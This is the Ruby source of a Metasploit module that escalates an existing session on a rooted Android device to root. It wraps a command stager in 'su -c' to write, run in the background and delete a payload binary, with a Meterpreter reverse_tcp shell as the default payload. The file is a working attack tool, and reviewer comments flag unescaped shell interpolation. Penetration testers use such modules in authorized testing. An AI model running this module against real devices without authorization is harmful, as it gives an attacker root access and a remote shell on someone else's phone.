GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/android/local/su_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Local module for sessions on rooted Android devices. It runs a command
# stager through the device's existing `su` binary so that the staged payload
# executes as root. It does not exploit a memory-safety or logic flaw; it
# relies on a su binary already being present and granting the request.
class MetasploitModule < Msf::Exploit::Local
  # Presumably ranked manual because, per the Description, most su
  # implementations prompt the device user for approval -- confirm.
  Rank = ManualRanking

  include Msf::Exploit::CmdStager
  include Msf::Post::File
  include Msf::Post::Android::Priv

  # Registers the module metadata and its two operator-facing options.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    module_info = {
      'Name' => "Android 'su' Privilege Escalation",
      'Description' => %q{
          This module uses the su binary present on rooted devices to run
          a payload as root.

          A rooted Android device will contain a su binary (often linked with
          an application) that allows the user to run commands as root.
          This module will use the su binary to execute a command stager
          as root. The command stager will write a payload binary to a
          temporary directory, make it executable, execute it in the background,
          and finally delete the executable.

          On most devices the su binary will pop-up a prompt on the device
          asking the user for permission.
      },
      'Author' => 'timwr',
      'License' => MSF_LICENSE,
      'DisclosureDate' => '2017-08-31',
      'SessionTypes' => [ 'meterpreter', 'shell' ],
      'Platform' => [ 'android', 'linux' ],
      'Targets' => [
        ['aarch64', { 'Arch' => ARCH_AARCH64 }],
        ['armle', { 'Arch' => ARCH_ARMLE }],
        ['x86', { 'Arch' => ARCH_X86 }],
        ['x64', { 'Arch' => ARCH_X64 }],
        ['mipsle', { 'Arch' => ARCH_MIPSLE }]
      ],
      'DefaultOptions' => {
        'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',
        'WfsDelay' => 5
      },
      'DefaultTarget' => 0,
      # ARTIFACTS_ON_DISK: the staged binary is written under WritableDir
      # (default /data/local/tmp/), so a file appears there during a run.
      'Notes' => {
        'SideEffects' => [ ARTIFACTS_ON_DISK ],
        'Reliability' => [ REPEATABLE_SESSION ],
        'Stability' => [ CRASH_SAFE ]
      }
    }
    super(update_info(info, module_info))

    register_options([
      OptString.new('SU_BINARY', [true, 'The su binary to execute to obtain root', 'su']),
      OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/']),
    ])
  end

  # @return [String] the WritableDir option, i.e. where the stager writes
  def base_dir
    datastore['WritableDir'].to_s
  end

  # @return [String] the SU_BINARY option, i.e. the su executable to invoke
  def su_bin
    datastore['SU_BINARY'].to_s
  end

  # Entry point. Refuses to run when the session is already root, then hands
  # off to the echo-flavoured command stager with octal encoding.
  def exploit
    fail_with(Failure::BadConfig, 'Session already has root privileges') if is_root?

    # The su binary name is prepended to every stager line by execute_command,
    # so its length is subtracted from the per-line budget. The 4088 base is
    # presumably a shell command-length limit -- TODO confirm.
    line_budget = 4088 - su_bin.size
    stager_opts = {
      flavor: :echo,
      enc_format: :octal,
      prefix: '\\\\0',
      temp: base_dir,
      linemax: line_budget,
      background: true
    }
    execute_cmdstager(stager_opts)
  end

  # Hook used by the CmdStager mixin: wraps one stager command in `su -c`
  # and runs it in the current session.
  #
  # NOTE(review): both su_bin and cmd are interpolated without escaping, and
  # cmd sits inside single quotes; a single quote in cmd would end the quoting
  # early. Presumably the octal echo stager never emits one -- confirm.
  #
  # @param cmd [String] the stager command line to run as root
  # @param _opts [Hash] stager options (unused here)
  def execute_command(cmd, _opts)
    root_cmd = "#{su_bin} -c '#{cmd}'"
    cmd_exec(root_cmd)
  end
end